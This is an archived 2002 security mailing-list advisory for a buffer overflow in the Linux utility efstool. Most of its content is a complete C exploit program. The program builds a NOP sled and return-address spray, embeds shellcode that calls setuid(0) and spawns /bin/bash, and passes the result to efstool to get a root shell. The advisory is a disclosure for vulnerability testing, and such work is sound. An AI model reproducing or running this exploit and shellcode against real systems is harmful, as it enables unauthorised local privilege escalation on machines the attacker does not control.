[EXPL] EFStool Local Root Exploit for Linux/x86
From: support@securiteam.comDate: 09/12/02
- Previous message: support@securiteam.com: "[NT] Norton Antivirus 2001 POP3 Proxy Local DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Thu, 12 Sep 2002 08:24:05 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
EFStool Local Root Exploit for Linux/x86
------------------------------------------------------------------------
SUMMARY
EFStool has been found to contain a security vulnerability that allows
local attackers to cause it to execute arbitrary code. The vulnerability
can be tested for by using the following exploit code. Note that EFStool
is not setuid by default on the major Linux flavors.
DETAILS
Exploit:
/* efstool.c - efstool/bof simple overflow in efstool,
*
*
* This code is published propterty of CloudAss, you may
* duplicate this in any shape or form without prior written
* permission from CloudAss.
*
* Bug discovered by ntfx, just figured I'd code a decent
* exploit for it.
*
*
* DISCLAIMER - I am in no way affiliated with ntfx or any members of
* soldierx or legion2002 security.
*
* Usage: ./efsroot offset - bruteforce if neccesary
*
* Bug is pretty stupid, and simple, I have yet to see it give root.
* efstool is not +s on slackware 8.0 , it should spawn a shell
* regardless.
*
* (C) COPYRIGHT CloudAss , 2002
* all rights reserved
***********************************************************************
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define SIZE 3000
#define NOP 0x90
#define PATH "/opt/gnome/bin/efstool"
//--------------------------------------------------
long get_esp(void){ __asm__("movl %esp,%eax\n");}
//--------------------------------------------------
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/bash";
int main(int argc, char *argv[]) {
char buffer[SIZE];
long retaddr, offset;
int i;
offset = atoi(argv[1]);
retaddr = get_esp() + offset;
for(i=0; i < SIZE; i+=4)
*(long *)&buffer[i] = retaddr;
for(i=0; i < strlen(shellcode); i++)
*(buffer+i) = NOP;
memcpy(buffer+i, shellcode, strlen(shellcode));
execl(PATH, "efstool", buffer, 12);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:cloudass@kernel.net>
Cloudass.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Norton Antivirus 2001 POP3 Proxy Local DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
